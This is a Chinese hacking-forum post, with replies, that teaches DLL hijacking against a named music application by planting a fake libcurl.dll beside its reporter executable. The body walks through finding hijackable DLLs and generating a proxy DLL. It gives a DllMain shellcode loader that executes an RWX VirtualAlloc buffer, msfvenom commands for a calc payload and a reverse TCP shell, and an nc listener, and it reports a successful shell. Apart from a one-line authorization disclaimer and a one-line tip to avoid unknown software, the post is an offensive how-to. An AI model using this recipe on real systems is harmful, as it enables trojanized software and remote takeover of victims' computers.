吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2591|回复: 34
上一主题 下一主题
收起左侧

[原创] 某易云点击弹计算器?一文教会你背后的所有知识——DLL劫持

[复制链接]
跳转到指定楼层
楼主
taoyangui 发表于 2025-11-8 21:10 回帖奖励
本帖最后由 taoyangui 于 2025-12-6 17:50 编辑

本文内容仅用于授权的安全研究、渗透测试和知识风享。严禁用于任何非法或未经授权的活动。


引言:

朋友说遇到一个某易云软件,说是破解版的,下载下来点击之后发现弹出计算器,问我怎么回事,简单看了下原来是个白加黑dll劫持啊,简单,其实不仅仅某易云可以所有调用dll的程序都可以。这就教会你。让你也能秀别人一脸!

一、dll文件

  DLL文件,全称为动态链接库(Dynamic Link Library),是Windows操作系统中的一种文件类型。它们是由多个相对独立的代码或资源组成的库,可以被多个程序在运行时共享。DLL文件的主要作用是提高内存管理效率和节约磁盘空间,因为它们允许程序在需要时才将这些库加载到内存中。

1.DLL文件的作用

  DLL文件中存储的是各类程序的函数(子过程)实现过程。当程序需要调用某个函数时,相关的DLL文件就会被加载,然后程序可以获取函数的地址并进行调用。这种方式的好处在于,程序不需要在启动时加载所有的代码,只有在需要某个函数时才从DLL中提取,这样可以减小程序的体积,并且提高运行效率。

2.DLL文件的共享性

  一个应用程序可以使用多个DLL文件,而一个DLL文件也可能被不同的应用程序使用。这样的DLL文件被称为共享DLL文件。通过使用DLL,程序可以实现模块化,由相对独立的组件组成。例如,一个计帐程序可以按模块来销售,只有在安装了相应模块时,这些模块才会在运行时加载到主程序中。

3.DLL文件的依赖性

  当一个程序或DLL使用其他DLL中的函数时,就会创建依赖关系。这意味着程序不再是独立的,如果依赖的DLL文件出现问题,程序也可能遇到问题。例如,如果依赖的DLL文件被升级或删除,或者被旧版本覆盖,都可能导致程序无法运行。这也是为什么会出现dll劫持之类的了,

4.dll劫持产生原因

  DLL劫持是一种利用Windows系统加载DLL文件顺序的技术。Windows系统在加载DLL文件时,会按照一定的顺序查找所需的DLL文件。如果攻击者在程序目录下放置一个恶意的DLL文件,并且该文件名与程序所需的DLL文件名相同,系统就会优先加载攻击者的DLL文件,从而执行恶意代码。
  白加黑是一种高级的DLL劫持技术,利用合法的白程序(如微信、QQ等)来执行恶意的黑行为。通过替换白程序所调用的DLL文件,实现恶意代码的执行。

二、白加黑dll劫持

1.判断

  主要判断的内容有两点,首先这个程序是不是白程序,可以简单理解为我们这个程序是否能够在正常情况下运行,会不会被杀毒软件拦截,还有就是是否调用了非系统自带的dll文件,如果本身就会被杀毒软件拦截,那整个程序就是个黑的,再去做dll劫持的意义也不大。第二个要判断的就是这个程序的哪些dll文件可以被用来做dll劫持的,要想做成dll劫持,那么程序一定要在运行的时候使用这个dll,两种方法,简称为原始法工具法吧。
  先看看原始法吧,原始法不依靠任何工具,单纯的靠拖拽文件来进行判断,这里我们用某易云音乐来举个例子。下载好我们的某易云音乐安装到我们的特定文件夹,

  很明显可以看出存在三个exe文件,这里我们不去进行判断哪个调用了dll文件,我们直接把三个exe文件拖出来到一个单独的文件夹,(通常情况下可以先把主程序拖出来运行看看)这里最主要的点就是让程序在没有任何dll的情况下运行,缺少的dll库他会自己提示我们,像下图这样


  通过提示的内容由于找不到 libcurl.dll,无法继续执行代码。重新安装程序可能会解决此问题,说明libcurl.dll在整个程序运行的过程中是必不可少的,这个也就是我们所要找的可以用来dll劫持的dll源文件。同时也表明了需要这个程序的cloudmusic_reporter.exe这个程序。
  看完我们朴实无华的原始法,接着看我们的工具法,这里用到的工具是ZeroEye,使用工具扫一下就能够成功得出了,(会生成一个单独的文件夹可以去文件夹里查看,帮助文档里面写的很清楚,这里就不过多赘述了)

ZeroEye项目地址:https://github.com/ImCoriander/ZeroEye

  两种方法都可以,不放心的话可以进行一下验证,验证方式也很好验证,上面两个方法都在跟我们说明cloudmusic_reporter.exe可以看作白文件,必须的dll是libcurl.dll,我们将这两个单独拿出来放到一个文件中,运行看看是否弹窗就好了,有的点击后会出现日志文件。

2.开始劫持

  弄清楚我们的要劫持的对象后就可以开启我们愉快的劫持了,这里我们需要用到一个工具Dependencies,什么没听过这个怎么办?没关系,我们这里用到的他的功能不多工具上手还是比较容易的,具体的工具介绍放在结尾了,

Dependencies工具下载地址:https://github.com/lucasg/Dependencies

成功拖入后界面如图:


这个时候选中我们拖入的程序,右键选择AHeadLib Codegen

  这个功能会帮助我们根据选中 DLL 的导出函数表(Exports),自动生成一个 C/C++ 头文件(.h) 和对应的源文件(.c/.cpp) 的代码(文章末尾有补充)选择一个纯英文的目录进行保存,保存完成会出现一个弹窗提示我们成功保存。保存完成后打开刚刚的文件夹,会发现多出几个文件,通常都是一个头文件(.h),一个源文件(.c/.cpp),一个汇编源文件(.asm)。

  完成上述步骤后就可以正式开始制作我们的黑dll了,使用Visual Studio创建新项目选择动态链接库(最好选用纯英文路径)。

  选择完路径进行创建即可,创建完成后会有四个文件,两个头文件,两个源文件


将我们之前导出的函数表拖入到新创建的路径中

Visual Studio中添加我们导出的函数表,右键之后点击添加,选择现有项。

将我们之前导出的文件添加进去,注意头文件和源文件的对应即可(.asm文件后缀是汇编语言源文件),最终效果图

然后将Visual Studio中的编译方式选择为Release,架构根据自己要dll劫持的程序进行选择即可。这里的我们使用的是x64架构来作为例子。

libcurl.c 这个文件运行的时候会获取dll内的函数并将其保存到指针内,指针会去改变原本的函数地址进行链接,使用汇编的放式进行跳转,也就是libcurl_jump.asm文件中的内容。如图中的各种jmp跳转

而我们做简单的dll劫持并不需要这个,这里只要将其全部删除掉即可

补充:这里还需要注意一点,在x86架构中/或者不同的软件当中会多出一些东西,仍然只删除跳转的代码就好。

这里将所有跳转的代码删除完之后,对头文件进行以下设置。在libcurl_jump.asm文件最开始的地方由工具直接生成的设置方法。

根据libcurl_jump.asm中的内容进行设置即可


按照他给出的文字对属性进行修改,

先按照给出的将项类型改为自定义生成工具,然后将从生成中排除选择点击应用。点击完应用后会刷新以下并多出自定义生成工具的侧边栏,根据给出的文字进行编写即可。

填写完成后点击应用,这个时候对libcurl_jump.asm的设置就完成了。接着完善其他的文件,需要在dllmain.cpp的头部引用libcurl.h头文件。此时的dllmain.cpp是一个标准的DLL入口点函数,简单看一下

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
//引入头文件

BOOL APIENTRY DllMain( HMODULE hModule,
//hModule:当前 DLL 模块的句柄,标识这个 DLL 在进程中的位置
                       DWORD  ul_reason_for_call,
//ul_reason_for_call:调用原因代码,说明为什么执行DllMain
                       LPVOID lpReserved
//lpReserved:保留参数,根据调用原因有不同的含义
                     )
{
    switch (ul_reason_for_call)
    {
    //进程附加
    case DLL_PROCESS_ATTACH:
        //线程附加
    case DLL_THREAD_ATTACH:
    //线程分离
    case DLL_THREAD_DETACH:
    //进程分离
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

这里只要将我们引入的头文件名称进行替换就好,修改完成后保存


此时进行生成会发现出现报错显示

这里是因为项目配置了使用预编译头(默认是pch.h),但这个时候我们的代码开头并没有使用预编译头,这个时候对其进行修改即可,右键将属性中的预编译头修改成不使⽤预编译头(哪个文件显示<em>在查找预编译头时遇到意外的文件结尾。是否忘记了向源中添加“#include "pch.h"”?</em>就对哪个文件进行修改)

修改完成解决报错后,重新进行编译生成,此时便可以成功的生成文件

这个时候生成的DLL文件是一个伪造出来的“干净的”.dll,重命名为libcurl.dll后放在我们某易云的软件下方,点击之后没有任何变化,某易云不会出报错,也不会正常的运行,查看任务管理器显示某易云音乐软件在运行,过一会回显示某易云崩溃掉了自己结束掉(毕竟我们的代码中什么都没有肯定没办法支撑某易云运行)。说明我们生成的libcurl.dll已经能够正常的被某易云接受使用,在生成之前将我们的想要实现功能的代码添加到文件中就可以正常劫持了。
回到我们的dllmain.cpp中,前面简单的提了一下case DLL_PROCESS_ATTACH:是进程附加,简单理解就是程序执行到这里之后将会执行以下后续代码,这里我们在case DLL_PROCESS_ATTACH:后添加{},后续在{}中写入我们的相关代码。这里我们先以点击某易云音乐后弹出计算器为例。
首先准备好弹出计算器的代码,这里我们直接使用msfvenom来进行生成

msfvenom -p windows/x64/exec CMD=calc.exe -f c


将生成的C语言数组复制粘贴到case DLL_PROCESS_ATTACH:
再将分配内存的代码写入

//x64
char* v7A = (char*)VirtualAlloc(0, sizeof(buf), 0x3000u, 0x40u);

memcpy((void*)v7A, buf, sizeof(buf));

((void(*)())v7A)();


点击生成即可

重命名为libcurl.dll将其拖到某易云程序的下面,点击某易云运行,成功弹出计算器。

程序会在弹出计算器过一会后崩溃,不过无伤大雅,我们要的目的已经实现了。接下来来进行一下反弹shell试试。先启动监听

nc -lvnp 6000

生成数组

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=端口 EXITFUNC=thread -f c

将生成后的shellcode放入文件当中,生成,重命名放入到某易云下,运行,成功接收到shell。

三、补充:依赖库查看工具Dependencies

  Dependencies是一款 Windows 平台下的静态分析工具,用来分析可执行文件(EXE、DLL 等)所依赖的动态链接库(DLL)。它可以帮助开发者和系统管理员快速查找程序在运行时可能缺少的库文件或其他依赖项,以及分析依赖库的加载顺序和路径。

核心功能与用途:

  1. 可视化依赖树:打开一个可执行文件后,工具会以树状图的形式展示其直接和间接依赖的所有 DLL(动态链接库)。可以清晰地看到 App.exe 依赖 A.dll,而 A.dll 又依赖 B.dll,如此层层递进。
  2. 列出导入函数:对于每个被依赖的 DLL,工具可以列出这个主程序从该DLL中调用了哪些具体的函数
  3. 列出导出函数:对于 DLL 文件,工具可以列出该DLL向外提供了哪些可供调用的函数
  4. 发现依赖问题这是它最常用、也是最关键的用途。可以精确诊断出遇到的 “由于找不到 XXXX.dll” 之类的错误。工具会用不同的颜色和图标来标记问题:                                   
    • 红色问号:表示根本找不到这个DLL文件。这是最致命的错误,程序会因此无法启动。                                 
    • 黄色问号:表示找到了DLL文件,但该DLL本身还有依赖项缺失,或者它在当前系统的搜索路径中不存在。这可能导致运行时错误。
    • 错误函数:如果找到了DLL,但DLL中缺少主程序需要调用的某个特定函数,该函数会被标记出来。

      各区块的功能:

      左上角第一个窗口是Dll信息窗口,显示程序所需的Dll模块。


      点击一个dll动态链,右边就会出现两个窗口。第一个窗口是所选的Dll模块所使用的函数,分为:序数、提示、函数、入口点等讯息。

      右边第二个窗口是所选Dll模块的所有的导出函数,也分为:序数、提示、函数、入口点等讯息。

      右键菜单栏中的各个功能

  5. Highlight Matching Module In List (Ctrl+M)
    • 用途高亮显示所有相同的模块
    • 使用场景:看到一个 DLL 被多个不同的模块(EXE 或其他 DLL)依赖时,使用这个功能可以快速在左侧的树形列表中高亮显示出所有引用了这个特定 DLL 的地方。这能帮助你一眼看清这个 DLL 的依赖范围,对于排查重复依赖或版本冲突非常有用。
  6. Copy File Path (Ctrl+C)
    • 用途复制当前选中模块的完整磁盘路径
    • 使用场景:发现一个可疑的或需要的 DLL,想直接在文件资源管理器中找到它时,不需要手动去搜索,用这个功能复制它的完整路径,然后可以粘贴到任何地方(例如文件管理器的地址栏或命令行中)。
  7. Expand All / Collapse All
    • 用途展开或折叠当前选中的节点及其所有子节点
    • 使用场景:分析一个具有复杂、深层依赖关系的模块时,树形结构会很长。使用这两个功能可以快速展开所有分支查看全部细节,或者折叠所有分支以便专注于上层结构。
  8. Full Paths (F9)
    • 用途切换是否显示模块的完整路径
    • 使用场景:默认情况下,左侧树形视图可能只显示 DLL 的文件名(如 KERNEL32.dll)。按下 F9 或勾选此选项后,它会显示每个 DLL 被加载位置的完整绝对路径(如 C:\Windows\System32\KERNEL32.dll)。主要用于区分不同路径下的同名 DLL(例如系统目录下的和应用程序自带目录下的),是诊断“DLL Hell”问题的核心功能。
  9. View Module in separate application (Alt+Enter)
    • 用途在新的 Dependencies 程序窗口中分析当前选中的模块
    • 使用场景:当你想专注于分析某一个特定的 DLL,而不想受整个庞大的父级依赖树干扰时,就用这个功能。它会单独打开一个窗口,只显示这个 DLL 的导入和导出表,查看起来更清晰。
  10. View Module in Reviewer (Alt+Enter)
    • 用途在右侧的“Reviewer”面板中查看当前选中模块的详细信息
    • 使用场景:这是最常用的功能之一。当你选中一个模块后,按 Alt+Enter 或点击此选项,会在右侧面板加载该模块的详细分析报告,包括:
    • Imports:这个模块依赖哪些其他模块和函数。  
    • Exports:这个模块提供了哪些函数给其他程序调用。
    • Runtime dependencies:运行时依赖
    • 其他详细信息(如时间戳、镜像特性等)。
  11. AHeadLib Codegen (Alt+Enter)
    • 用途为一个头文件库(Header Library)生成代码。这是一个非常好用的功能,特别是进行逆向工程或 hooking 的开发者。
    • 使用场景:AHeadLib 是一个用于创建“头文件形式的 DLL 导入库”的工具。当你有一个 DLL,想直接使用它的函数而不需要传统的 .lib 导入库文件时,可以使用这个功能。
    • 它会根据选中 DLL 的导出函数表(Exports),自动生成一个 C/C++ 头文件(.h) 和对应的源文件(.c/.cpp) 的代码。
    • 生成的代码包含了所有导出函数的正确声明和包装,你可以将这些文件直接加入到你的项目中,从而调用该 DLL 的函数。
    • 分析未文档化的 DLL 或为第三方 DLL 快速创建导入接口时非常强大。

      四、如何规避

      规避方法也很简单不要轻易下载不明来源的软件就好了

免费评分

参与人数 32威望 +2 吾爱币 +128 热心值 +29 收起 理由
sohowtodo + 1 我很赞同!
zzpu213 + 1 + 1 我很赞同!
FengYou + 1 + 1 热心回复!
Eureka8 + 1 + 1 谢谢@Thanks!
z2018hou + 1 + 1 用心讨论,共获提升!
kdjnb + 1 + 1 我很赞同!
Hmily + 2 + 100 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
qazplmwsx + 1 + 1 谢谢@Thanks!
影风 + 1 + 1 我很赞同!
ZMST123 + 1 + 1 我很赞同!
Siyawan520 + 1 + 1 我很赞同!
lixuedong + 1 我很赞同!
xiguadaodaodao + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Brinish + 1 + 1 我很赞同!
MTE0NTE0 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
chaifengbox + 1 + 1 用心讨论,共获提升!
QElite + 1 用心讨论,共获提升!
EvalShell857 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Eureka112 + 1 我很赞同!
过江龙2004 + 1 + 1 我很赞同!
IcePlume + 1 + 1 我很赞同!
HakureiYuyuko + 1 + 1 用心讨论,共获提升!
zfl + 1 + 1 谢谢@Thanks!
yszx1 + 1 我很赞同!
OeDy + 1 + 1 我很赞同!
Dove702 + 1 + 1 谢谢@Thanks!
foolwsk + 1 + 1 我很赞同!
兮以城空 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
hunfeifei + 1 + 1 鼓励转贴优秀软件安全工具和文档!
buluo533 + 1 + 1 用心讨论,共获提升!
bullshit + 1 + 1 谢谢@Thanks!
52kail + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

来自 #
 楼主| taoyangui 发表于 2025-12-1 20:57 |楼主
本帖最后由 taoyangui 于 2025-12-1 20:59 编辑
zzpu213 发表于 2025-12-1 16:25
为什么我这里文章的图片看不了,是我网络问题还是图片被吞了

图片被吞了,这几天得流感了,等好点了统一更改一下
推荐
laos 发表于 2025-11-9 12:58
本帖最后由 laos 于 2025-11-10 11:19 编辑
Dependencies工具下载地址:https://www.dependencywalker.com/

这里错了吧~

提供的是Dependencywalker下载地址

Dependencies下载地址: https://github.com/lucasg/Dependencies

支持AHLib插件的Dependencies下载地址: https://bbs.kanxue.com/thread-260874.htm (不知是否违规)

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
taoyangui + 1 + 1 谢谢@Thanks!

查看全部评分

推荐
 楼主| taoyangui 发表于 2025-11-10 15:54 |楼主
bester 发表于 2025-11-10 15:49
你拿自己做的libcurl.dll,那么正常的libcurl.dll应该怎么加载? 需要对原始的libcurl.dll改名吗

以后不用网易云的话直接拖进去覆盖掉就好了,要是还用的话就重命名一下玩完之后替换回去就好啦
4#
Dove702 发表于 2025-11-9 09:52
由简到深,终于让我这个小白了解了DLL文件的作用和功能,谢谢分享。
5#
OeDy 发表于 2025-11-9 10:49
谢谢,学习了。
6#
yszx1 发表于 2025-11-9 11:42
学到许多 感谢楼主细心的教程
7#
 楼主| taoyangui 发表于 2025-11-9 13:04 |楼主
laos 发表于 2025-11-9 12:58
这里错了吧~

提供的是Dependencywalker下载地址, 而Dependencies是在Dependencywalker进行升级重写
...

确实粘贴错了,感谢指正
8#
zt185 发表于 2025-11-10 14:51
教程详细,大神出品学习了!
9#
IcePlume 发表于 2025-11-10 15:35
还有这种操作,学习一下
10#
bester 发表于 2025-11-10 15:49
你拿自己做的libcurl.dll,那么正常的libcurl.dll应该怎么加载? 需要对原始的libcurl.dll改名吗
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-1-24 05:02

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表